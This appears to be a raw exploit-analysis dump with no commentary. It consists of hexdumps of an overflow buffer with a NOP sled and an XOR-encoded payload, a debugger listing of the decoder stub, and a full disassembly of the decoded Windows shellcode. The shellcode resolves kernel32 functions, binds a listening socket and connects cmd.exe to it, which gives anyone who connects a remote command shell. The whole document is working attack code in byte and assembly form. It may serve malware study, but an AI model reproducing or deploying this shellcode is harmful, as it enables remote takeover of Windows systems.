hexdump
00000000 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 |CCCCCCCCCCCCCCCC|
*
00000100 43 43 43 43 43 43 43 43 43 43 43 43 4d 3f e3 77 |CCCCCCCCCCCCM?ãw|
00000110 90 90 90 90 ff 63 64 90 43 43 43 43 43 43 43 43 |....ÿcd.CCCCCCCC|
00000120 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 |CCCCCCCCCCCCCCCC|
00000130 43 43 43 43 43 43 43 43 90 eb 03 5d eb 05 e8 f8 |CCCCCCCC.ë.]ë.èø|
00000140 ff ff ff 83 c5 15 90 90 90 8b c5 33 c9 66 b9 10 |ÿÿÿ.Å.....Å3Éf¹.|
00000150 03 50 80 30 97 40 e2 fa 7e 8e 95 97 97 cd 1c 4d |.P.0.@âú~....Í.M|
00000160 14 7c 90 fd 68 c4 f3 36 97 97 97 97 c7 f3 1e b2 |.|.ýhÄó6....Çó.²|
00000170 97 97 97 97 a4 4c 2c 97 97 77 e0 7f 4b 96 97 97 |....€L,..wà.K...|
00000180 16 6c 97 97 68 28 98 14 59 96 97 97 16 54 97 97 |.l..h(..Y....T..|
00000190 96 97 f1 16 ac da cd e2 70 a4 57 1c d4 ab 94 54 |..ñ.¬ÚÍâp€W.Ô«.T|
000001a0 f1 16 af c7 d2 e2 4e 14 57 ef 1c a7 94 64 1c d9 |ñ.¯ÇÒâN.Wï.§.d.Ù|
000001b0 9b 94 5c 16 ae dc d2 c5 d9 e2 52 16 ee 93 d2 db |..\.®ÜÒÅÙâR.î.ÒÛ|
000001c0 a4 a5 e2 2b a4 68 1c d1 b7 94 54 1c 5c 94 9f 16 |€¥â+€h.Ñ·.T.\...|
000001d0 ae d0 f2 e3 c7 e2 9e 16 ee 93 e5 f8 f4 d6 e3 91 |®ÐòãÇâ..î.åøôÖã.|
000001e0 d0 14 57 93 7c 72 94 68 94 6c 1c c1 b3 94 6d a4 |Ð.W.|r.h.l.Á³.m€|
000001f0 45 f1 1c 80 1c 6d 1c d1 87 df 94 6f a4 5e 1c 58 |Eñ...m.Ñ.ß.o€^.X|
00000200 94 5e 94 5e 94 d9 8b 94 5c 1c ae 94 6c 7e fe 96 |.^.^.Ù..\.®.l~þ.|
00000210 97 97 c9 10 60 1c 40 a4 57 60 47 1c 5f 65 38 1e |..É.`.@€W`G._e8.|
00000220 a5 1a d5 9f c5 c7 c4 68 85 cd 1e d5 93 1a e5 82 |¥.Õ.ÅÇÄh.Í.Õ..å.|
00000230 c5 c1 68 c5 93 cd a4 57 3b 13 57 e2 6e a4 5e 1d |ÅÁhÅ.Í€W;.Wân€^.|
00000240 99 13 5e e3 9e c5 c1 c4 68 85 cd 3c 75 7f d1 c5 |..^ã.ÅÁÄh.Í<u.ÑÅ|
00000250 c1 68 c5 93 cd 1c 4f a4 57 3b 13 57 e2 6e a4 5e |ÁhÅ.Í.O€W;.Wân€^|
00000260 1d 99 17 6e 95 e3 9e c5 c1 c4 68 85 cd 3c 75 70 |...n.ã.ÅÁÄh.Í<up|
00000270 a4 57 c7 d7 c7 d7 c7 68 c0 7f 04 fd 87 c1 c4 68 |€WÇ×Ç×ÇhÀ..ý.ÁÄh|
00000280 c0 7b fd 95 c4 68 c0 67 a4 57 c0 c7 27 9b 3c cf |À{ý.ÄhÀg€WÀÇ'.<Ï|
00000290 3c d7 3c c8 df c7 c0 c1 3a c1 68 c0 57 df c7 c0 |<×<ÈßÇÀÁ:ÁhÀWßÇÀ|
000002a0 3a c1 3a c1 68 c0 57 df 27 d3 1e 90 c0 68 c0 53 |:Á:ÁhÀWß'Ó..ÀhÀS|
000002b0 a4 57 1c d1 63 1e d0 ab 1e d0 d7 1c 91 1e d0 af |€W.Ñc.Ы.Ð×...Я|
000002c0 a4 57 f1 2f 96 96 1e d0 bb c0 c0 a4 57 c7 c7 c7 |€Wñ/...лÀÀ€WÇÇÇ|
000002d0 d7 c7 df c7 c7 3a c1 a4 57 c7 68 c0 5f 68 e1 67 |×ÇßÇÇ:Á€WÇhÀ_hág|
000002e0 68 c0 5b 68 e1 6b 68 c0 5b df c7 c7 c4 68 c0 63 |hÀ[hákhÀ[ßÇÇÄhÀc|
000002f0 1c 4f a4 57 23 93 c7 56 7f 93 c7 68 c0 43 1c 67 |.O€W#.ÇV..ÇhÀC.g|
00000300 a4 57 1c 5f 22 93 c7 c7 c0 c6 c1 68 e0 3f 68 c0 |€W._".ÇÇÀÆÁhà?hÀ|
00000310 47 14 a8 96 eb b5 a4 57 c7 c0 68 a0 c1 68 e0 3f |G.š.ëµ€WÇÀh Áhà?|
00000320 68 c0 4b 9c 57 e3 b8 a4 57 c7 68 a0 c1 c4 68 c0 |hÀK.W㞀WÇh ÁÄhÀ|
00000330 6f fd c7 68 c0 77 7c 5f a4 57 c7 23 93 c7 c1 c4 |oýÇhÀw|_€WÇ#.ÇÁÄ|
00000340 68 c0 6b c0 a4 5e c6 c7 c1 68 e0 3b 68 c0 4f fd |hÀkÀ€^ÆÇÁhà;hÀOý|
00000350 c7 68 c0 77 7c 3d c7 68 c0 73 7c 69 cf c7 1e d5 |ÇhÀw|=ÇhÀs|iÏÇ.Õ|
00000360 65 54 1c d3 b3 9b 92 2f 97 97 97 50 97 ef c1 a3 |eT.Ó³../...P.ïÁ£|
00000370 85 a4 57 54 7c 7b 7f 75 6a 68 68 7f 05 69 68 68 |.€WT|{.ujhh..ihh|
00000380 dc c1 70 e0 b4 17 70 e0 db f8 f6 f3 db fe f5 e5 |ÜÁpàŽ.pàÛøöóÛþõå|
00000390 f6 e5 ee d6 97 dc d2 c5 d9 d2 db a4 a5 97 d4 e5 |öåîÖ.ÜÒÅÙÒÛ€¥.Ôå|
000003a0 f2 f6 e3 f2 c7 fe e7 f2 97 d0 f2 e3 c4 e3 f6 e5 |òöãòÇþçò.ÐòãÄãöå|
000003b0 e3 e2 e7 de f9 f1 f8 d6 97 d4 e5 f2 f6 e3 f2 c7 |ãâçÞùñøÖ.ÔåòöãòÇ|
000003c0 e5 f8 f4 f2 e4 e4 d6 97 d4 fb f8 e4 f2 df f6 f9 |åøôòääÖ.Ôûøäòßöù|
000003d0 f3 fb f2 97 c7 f2 f2 fc d9 f6 fa f2 f3 c7 fe e7 |óûò.ÇòòüÙöúòóÇþç|
000003e0 f2 97 d0 fb f8 f5 f6 fb d6 fb fb f8 f4 97 c0 e5 |ò.ÐûøõöûÖûûøô.Àå|
000003f0 fe e3 f2 d1 fe fb f2 97 c5 f2 f6 f3 d1 fe fb f2 |þãòÑþûò.ÅòöóÑþûò|
00000400 97 c4 fb f2 f2 e7 97 d2 ef fe e3 c7 e5 f8 f4 f2 |.Äûòòç.ÒïþãÇåøôò|
00000410 e4 e4 97 97 c0 c4 d8 d4 dc a4 a5 97 e4 f8 f4 fc |ää..ÀÄØÔÜ€¥.äøôü|
00000420 f2 e3 97 f5 fe f9 f3 97 fb fe e4 e3 f2 f9 97 f6 |òã.õþùó.ûþäãòù.ö|
00000430 f4 f4 f2 e7 e3 97 e4 f2 f9 f3 97 e5 f2 f4 e1 97 |ôôòçã.äòùó.åòôá.|
00000440 95 97 89 fb 97 97 97 97 97 97 97 97 97 97 97 97 |...û............|
00000450 f4 fa f3 b9 f2 ef f2 97 68 68 68 68 0d 0a 0d 0a |ôúó¹òïò.hhhh....|
00000460 00 |.|
00000461
00000000 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 |CCCCCCCCCCCCCCCC| * 00000100 43 43 43 43 43 43 43 43 43 43 43 43 4d 3f e3 77 |CCCCCCCCCCCCM?ãw| 00000110 90 90 90 90 ff 63 64 90 43 43 43 43 43 43 43 43 |....ÿcd.CCCCCCCC| 00000120 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 |CCCCCCCCCCCCCCCC| 00000130 43 43 43 43 43 43 43 43 90 90 90 90 90 90 90 90 |CCCCCCCC........| 00000140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| 00000150 90 90 90 90 90 90 90 90 e9 19 02 00 00 5a 8b da |........é....Z.Ú| 00000160 83 eb 07 6a ff 53 64 a1 00 00 00 00 50 64 89 25 |.ë.jÿSd¡....Pd.%| 00000170 00 00 00 00 33 db bb 00 00 e0 77 e8 dc 01 00 00 |....3Û»..àwèÜ...| 00000180 81 fb 00 00 ff bf 0f 83 ce 01 00 00 81 c3 00 00 |.û..ÿ¿..Î....Ã..| 00000190 01 00 66 81 3b 4d 5a 75 e7 33 c0 8b 43 3c 03 c3 |..f.;MZuç3À.C<.Ã| 000001a0 66 81 38 50 45 75 d9 83 c0 78 8b 30 03 f3 8b 4e |f.8PEuÙ.Àx.0.ó.N| 000001b0 0c 03 cb 81 39 4b 45 52 4e 75 c5 81 79 04 45 4c |..Ë.9KERNuÅ.y.EL| 000001c0 33 32 75 bc 33 ff 8b 46 20 03 c3 8b cb 03 08 81 |32uŒ3ÿ.F .Ã.Ë...| 000001d0 39 47 65 74 50 75 09 81 79 04 72 6f 63 41 74 06 |9GetPu..y.rocAt.| 000001e0 47 83 c0 04 eb e5 03 ff 03 fb 8b 56 24 03 fa 33 |G.À.ëå.ÿ.û.V$.ú3| 000001f0 d2 66 8b 17 8b fa 8b 46 10 48 03 f8 33 c9 8b cf |Òf...ú.F.H.ø3É.Ï| 00000200 03 c9 03 c9 03 4e 1c 03 cb 8b 39 03 fb e9 69 01 |.É.É.N..Ë.9.ûéi.| 00000210 00 00 5e 87 f7 8b d7 33 c0 f7 d0 8b c8 f2 af 89 |..^.÷.×3À÷Ð.Èò¯.| 00000220 32 8d 42 08 52 50 53 ff 12 5a 89 42 04 8d 72 15 |2.B.RPSÿ.Z.B..r.| 00000230 52 56 ff 52 04 5a 33 c0 ac 84 c0 75 f9 33 c9 8a |RVÿR.Z3À¬.Àuù3É.| 00000240 0e 84 c9 74 09 52 56 53 ff 12 5a ab e2 e8 46 52 |..Ét.RVSÿ.Z«âèFR| 00000250 56 ff 52 04 5a 8b d8 33 c0 ac 84 c0 75 f9 33 c9 |VÿR.Z.Ø3À¬.Àuù3É| 00000260 8a 0e 80 f9 02 74 09 52 56 53 ff 12 5a ab e2 e7 |...ù.t.RVSÿ.Z«âç| 00000270 33 c0 50 40 50 40 50 ff 57 e8 93 6a 10 56 53 ff |3ÀP@P@PÿWè.j.VSÿ| 00000280 57 ec 6a 02 53 ff 57 f0 33 c0 57 50 b0 0c ab 58 |Wìj.SÿWð3ÀWP°.«X| 00000290 ab 40 ab 5f 48 50 57 56 ad 56 ff 57 c0 48 50 57 |«@«_HPWVVÿWÀHPW| 000002a0 ad 56 ad 56 ff 57 c0 48 b0 44 89 07 57 ff 57 c4 |VVÿWÀH°D..WÿWÄ| 000002b0 33 c0 8b 46 f4 89 47 3c 89 47 40 8b 06 89 47 38 |3À.Fô.G<.G@...G8| 000002c0 33 c0 66 b8 01 01 89 47 2c 57 57 33 c0 50 50 50 |3Àfž...G,WW3ÀPPP| 000002d0 40 50 48 50 50 ad 56 33 c0 50 ff 57 c8 ff 76 f0 |@PHPPV3ÀPÿWÈÿvð| 000002e0 ff 57 cc ff 76 fc ff 57 cc 48 50 50 53 ff 57 f4 |ÿWÌÿvüÿWÌHPPSÿWô| 000002f0 8b d8 33 c0 b4 04 50 c1 e8 04 50 ff 57 d4 8b f0 |.Ø3ÀŽ.PÁè.PÿWÔ.ð| 00000300 33 c0 8b c8 b5 04 50 50 57 51 56 ff 77 a8 ff 57 |3À.ȵ.PPWQVÿwšÿW| 00000310 d0 83 3f 01 7c 22 33 c0 50 57 ff 37 56 ff 77 a8 |Ð.?.|"3ÀPWÿ7Vÿwš| 00000320 ff 57 dc 0b c0 74 2f 33 c0 50 ff 37 56 53 ff 57 |ÿWÜ.Àt/3ÀPÿ7VSÿW| 00000330 f8 6a 50 ff 57 e0 eb c8 33 c0 50 b4 04 50 56 53 |øjPÿWàëÈ3ÀPŽ.PVS| 00000340 ff 57 fc 57 33 c9 51 50 56 ff 77 ac ff 57 d8 6a |ÿWüW3ÉQPVÿw¬ÿWØj| 00000350 50 ff 57 e0 eb aa 50 ff 57 e4 eb fe 58 50 89 42 |PÿWàëªPÿWäëþXP.B| 00000360 f2 c3 8b 44 24 0c 05 b8 00 00 00 c7 00 78 56 34 |òÃ.D$..ž...Ç.xV4| 00000370 12 33 c0 c3 eb ec e8 e2 fd ff ff e8 92 fe ff ff |.3ÀÃëìèâýÿÿè.þÿÿ| 00000380 4b 56 e7 77 23 80 e7 77 4c 6f 61 64 4c 69 62 72 |KVçw#.çwLoadLibr| 00000390 61 72 79 41 00 4b 45 52 4e 45 4c 33 32 00 43 72 |aryA.KERNEL32.Cr| 000003a0 65 61 74 65 50 69 70 65 00 47 65 74 53 74 61 72 |eatePipe.GetStar| 000003b0 74 75 70 49 6e 66 6f 41 00 43 72 65 61 74 65 50 |tupInfoA.CreateP| 000003c0 72 6f 63 65 73 73 41 00 43 6c 6f 73 65 48 61 6e |rocessA.CloseHan| 000003d0 64 6c 65 00 50 65 65 6b 4e 61 6d 65 64 50 69 70 |dle.PeekNamedPip| 000003e0 65 00 47 6c 6f 62 61 6c 41 6c 6c 6f 63 00 57 72 |e.GlobalAlloc.Wr| 000003f0 69 74 65 46 69 6c 65 00 52 65 61 64 46 69 6c 65 |iteFile.ReadFile| 00000400 00 53 6c 65 65 70 00 45 78 69 74 50 72 6f 63 65 |.Sleep.ExitProce| 00000410 73 73 00 00 57 53 4f 43 4b 33 32 00 73 6f 63 6b |ss..WSOCK32.sock| 00000420 65 74 00 62 69 6e 64 00 6c 69 73 74 65 6e 00 61 |et.bind.listen.a| 00000430 63 63 65 70 74 00 73 65 6e 64 00 72 65 63 76 00 |ccept.send.recv.| 00000440 02 00 1e 6c 00 00 00 00 00 00 00 00 00 00 00 00 |...l............| 00000450 63 6d 64 2e 65 78 65 00 ff ff ff ff 9a 9d 9a 9d |cmd.exe.ÿÿÿÿ....| 00000460 97 |.| 00000461
00421A32 EB 03 JMP SHORT dummy2.00421A37 00421A34 5D POP EBP 00421A35 EB 05 JMP SHORT dummy2.00421A3C 00421A37 E8 F8FFFFFF CALL dummy2.00421A34 00421A3C 83C5 15 ADD EBP,15 00421A3F 90 NOP 00421A40 90 NOP 00421A41 90 NOP 00421A42 8BC5 MOV EAX,EBP 00421A44 33C9 XOR ECX,ECX 00421A46 66:B9 1003 MOV CX,310 ; len 310 00421A4A 50 PUSH EAX 00421A4B 8030 97 XOR BYTE PTR DS:[EAX],97 ; xor key 97 00421A4E 40 INC EAX 00421A4F ^E2 FA LOOPD SHORT dummy2.00421A4B
00000158 jmp loc_376 0000015D ; --------------------------------------------------------------------------- 0000015D 0000015D loc_15D: 0000015D pop edx 0000015E mov ebx, edx 00000160 sub ebx, 7 00000163 push 0FFFFFFFFh 00000165 push ebx 00000166 mov eax, large fs:0 0000016C push eax 0000016D mov large fs:0, esp 00000174 xor ebx, ebx 00000176 mov ebx, 77E00000h 0000017B call loc_35C 00000180 00000180 loc_180: 00000180 cmp ebx, 0BFFF0000h 00000186 00000186 loc_186: 00000186 jnb loc_35A 0000018C add ebx, 10000h 00000192 cmp word ptr [ebx], 'ZM' 00000197 jnz short loc_180 00000199 xor eax, eax 0000019B mov eax, [ebx+3Ch] 0000019E add eax, ebx 000001A0 cmp word ptr [eax], 'EP' 000001A5 jnz short loc_180 000001A7 add eax, 78h 000001AA mov esi, [eax] 000001AC add esi, ebx 000001AE mov ecx, [esi+0Ch] 000001B1 add ecx, ebx 000001B3 cmp dword ptr [ecx], 'NREK' 000001B9 jnz short loc_180 000001BB cmp dword ptr [ecx+4], '23LE' 000001C2 jnz short loc_180 000001C4 xor edi, edi 000001C6 mov eax, [esi+20h] 000001C9 add eax, ebx 000001CB 000001CB loc_1CB: 000001CB mov ecx, ebx 000001CD add ecx, [eax] 000001CF cmp dword ptr [ecx], 'PteG' 000001D5 jnz short loc_1E0 000001D7 cmp dword ptr [ecx+4], 'Acor' 000001DE jz short loc_1E6 000001E0 000001E0 loc_1E0: 000001E0 inc edi 000001E1 add eax, 4 000001E4 jmp short loc_1CB 000001E6 ; --------------------------------------------------------------------------- 000001E6 000001E6 loc_1E6: 000001E6 add edi, edi 000001E8 add edi, ebx 000001EA mov edx, [esi+24h] 000001ED add edi, edx 000001EF xor edx, edx 000001F1 mov dx, [edi] 000001F4 mov edi, edx 000001F6 mov eax, [esi+10h] 000001F9 dec eax 000001FA add edi, eax 000001FC xor ecx, ecx 000001FE mov ecx, edi 00000200 add ecx, ecx 00000202 add ecx, ecx 00000204 add ecx, [esi+1Ch] 00000207 add ecx, ebx 00000209 mov edi, [ecx] 0000020B add edi, ebx 0000020D jmp loc_37B 00000212 ; --------------------------------------------------------------------------- 00000212 00000212 loc_212: 00000212 pop esi 00000213 xchg esi, edi ; esi=GetProcAddress 00000215 mov edx, edi ; edi=hGetProcAddress 00000217 xor eax, eax 00000219 not eax 0000021B mov ecx, eax 0000021D repne scasd 0000021F mov [edx], esi 00000221 lea eax, [edx+8] ; "LoadLibraryA" 00000224 push edx 00000225 push eax 00000226 push ebx 00000227 call dword ptr [edx] ; GetProcAddress 00000229 pop edx 0000022A mov [edx+4], eax 0000022D lea esi, [edx+15h] ; "KERNEL32" 00000230 push edx 00000231 push esi 00000232 call dword ptr [edx+4] ; LoadLibraryA 00000235 pop edx 00000236 00000236 loc_236: 00000236 xor eax, eax 00000238 lodsb 00000239 test al, al 0000023B jnz short loc_236 0000023D xor ecx, ecx 0000023F mov cl, [esi] 00000241 test cl, cl 00000243 jz short loc_24E 00000245 push edx 00000246 push esi 00000247 push ebx 00000248 call dword ptr [edx] ; GetProcAddress 0000024A pop edx 0000024B stosd 0000024C loop loc_236 0000024E 0000024E loc_24E: 0000024E inc esi 0000024F push edx 00000250 push esi 00000251 call dword ptr [edx+4] ; LoadLibrary 00000254 pop edx 00000255 mov ebx, eax 00000257 00000257 loc_257: 00000257 xor eax, eax 00000259 lodsb 0000025A test al, al 0000025C jnz short loc_257 0000025E xor ecx, ecx 00000260 mov cl, [esi] 00000262 cmp cl, 2 00000265 jz short loc_270 00000267 push edx 00000268 push esi 00000269 push ebx 0000026A call dword ptr [edx] ; GetProcAddress 0000026C pop edx 0000026D stosd 0000026E loop loc_257 00000270 00000270 loc_270: 00000270 xor eax, eax ; esi = offset sockaddr 00000272 push eax 00000273 inc eax 00000274 push eax 00000275 inc eax 00000276 push eax 00000277 call dword ptr [edi-18h] ; socket 0000027A xchg eax, ebx ; ebx=hSocket 0000027B push 10h 0000027D push esi ; offset sockaddr 0000027E push ebx 0000027F call dword ptr [edi-14h] ; bind 00000282 push 2 00000284 push ebx 00000285 call dword ptr [edi-10h] ; listen 00000288 xor eax, eax 0000028A push edi 0000028B push eax 0000028C mov al, 0Ch 0000028E stosd 0000028F pop eax 00000290 stosd 00000291 inc eax 00000292 stosd 00000293 pop edi 00000294 dec eax 00000295 push eax 00000296 push edi 00000297 push esi 00000298 lodsd 00000299 push esi 0000029A call dword ptr [edi-40h] ; CreatePipe 0000029D dec eax 0000029E push eax 0000029F push edi 000002A0 lodsd 000002A1 push esi 000002A2 lodsd 000002A3 push esi 000002A4 call dword ptr [edi-40h] ; CreatePipe 000002A7 dec eax 000002A8 mov al, 44h ; 'D' 000002AA mov [edi], eax 000002AC push edi 000002AD call dword ptr [edi-3Ch] ; GetStartupInfoA 000002B0 xor eax, eax 000002B2 mov eax, [esi-0Ch] 000002B5 mov [edi+3Ch], eax 000002B8 mov [edi+40h], eax 000002BB mov eax, [esi] 000002BD mov [edi+38h], eax 000002C0 xor eax, eax 000002C2 mov ax, 101h 000002C6 mov [edi+2Ch], eax 000002C9 push edi 000002CA push edi 000002CB xor eax, eax 000002CD push eax 000002CE push eax 000002CF push eax 000002D0 inc eax 000002D1 push eax 000002D2 dec eax 000002D3 push eax 000002D4 push eax 000002D5 lodsd 000002D6 push esi 000002D7 xor eax, eax 000002D9 push eax 000002DA call dword ptr [edi-38h] ; CreateProcess 000002DD push dword ptr [esi-10h] 000002E0 call dword ptr [edi-34h] ; CloseHandle 000002E3 push dword ptr [esi-4] 000002E6 call dword ptr [edi-34h] ; CloseHandle 000002E9 dec eax 000002EA push eax 000002EB push eax 000002EC push ebx 000002ED call dword ptr [edi-0Ch] ; accept 000002F0 mov ebx, eax 000002F2 xor eax, eax 000002F4 mov ah, 4 000002F6 push eax 000002F7 shr eax, 4 000002FA push eax 000002FB call dword ptr [edi-2Ch] ; GlobalAlloc 000002FE mov esi, eax 00000300 00000300 loc_300: 00000300 xor eax, eax 00000302 mov ecx, eax 00000304 mov ch, 4 00000306 push eax 00000307 push eax 00000308 push edi 00000309 push ecx 0000030A push esi 0000030B push dword ptr [edi-58h] 0000030E 0000030E loc_30E: ; PeekNamedPipe 0000030E call dword ptr [edi-30h] 00000311 cmp dword ptr [edi], 1 00000314 jl short loc_338 00000316 xor eax, eax 00000318 push eax 00000319 push edi 0000031A push dword ptr [edi] 0000031C push esi 0000031D push dword ptr [edi-58h] 00000320 call dword ptr [edi-24h] ; ReadFile 00000323 or eax, eax 00000325 jz short loc_356 00000327 xor eax, eax 00000329 push eax 0000032A push dword ptr [edi] 0000032C push esi 0000032D push ebx 0000032E call dword ptr [edi-8] ; send 00000331 push 50h ; 'P' 00000333 call dword ptr [edi-20h] ; Sleep 00000336 jmp short loc_300 00000338 ; --------------------------------------------------------------------------- 00000338 00000338 loc_338: 00000338 xor eax, eax 0000033A push eax 0000033B mov ah, 4 0000033D push eax 0000033E push esi 0000033F push ebx 00000340 call dword ptr [edi-4] ; recv 00000343 push edi 00000344 xor ecx, ecx 00000346 push ecx 00000347 push eax 00000348 push esi 00000349 push dword ptr [edi-54h] 0000034C call dword ptr [edi-28h] ; WriteFile 0000034F push 50h ; 'P' 00000351 call dword ptr [edi-20h] ; Sleep 00000354 jmp short loc_300 00000356 ; --------------------------------------------------------------------------- 00000356 00000356 loc_356: 00000356 push eax 00000357 call dword ptr [edi-1Ch] ; ExitProcess 0000035A 0000035A loc_35A: 0000035A jmp short loc_35A 0000035C ; --------------------------------------------------------------------------- 0000035C 0000035C loc_35C: 0000035C pop eax 0000035D push eax 0000035E mov [edx-0Eh], eax 00000361 retn 00000362 ; --------------------------------------------------------------------------- 00000362 00000362 loc_362: 00000362 mov eax, [esp+0Ch] 00000366 add eax, 0B8h ; '©' 0000036B mov dword ptr [eax], 12345678h 00000371 xor eax, eax 00000373 retn 00000374 ; --------------------------------------------------------------------------- 00000374 jmp short loc_362 00000376 ; --------------------------------------------------------------------------- 00000376 00000376 loc_376: 00000376 call loc_15D 0000037B 0000037B loc_37B: 0000037B call loc_212 0000037B ; --------------------------------------------------------------------------- 00000380 hGetProcAddress dd 77E7564Bh 00000384 hLoadLibraryA dd 77E78023h 00000388 aLoadlibrarya db 'LoadLibraryA',0 00000395 aKernel32 db 'KERNEL32',0 0000039E aCreatepipe db 'CreatePipe',0 000003A9 aGetstartupinfo db 'GetStartupInfoA',0 000003B9 aCreateprocessa db 'CreateProcessA',0 000003C8 aClosehandle db 'CloseHandle',0 000003D4 aPeeknamedpipe db 'PeekNamedPipe',0 000003E2 aGlobalalloc db 'GlobalAlloc',0 000003EE aWritefile db 'WriteFile',0 000003F8 aReadfile db 'ReadFile',0 00000401 aSleep db 'Sleep',0 00000407 aExitprocess db 'ExitProcess',0 00000413 db 0 00000414 aWsock32 db 'WSOCK32',0 0000041C aSocket db 'socket',0 00000423 aBind db 'bind',0 00000428 aListen db 'listen',0 0000042F aAccept db 'accept',0 00000436 aSend db 'send',0 0000043B aRecv db 'recv',0 00000440 sockaddr dw 2 ; sin_family 0x440 00000440 dw 6C1Eh ; sin_port 0x442 00000440 dd 0 ; sin_addr 0x444 00000440 db 8 dup(0) ; sin_zero 0x448 00000450 aCmd_exe db 'cmd.exe',0
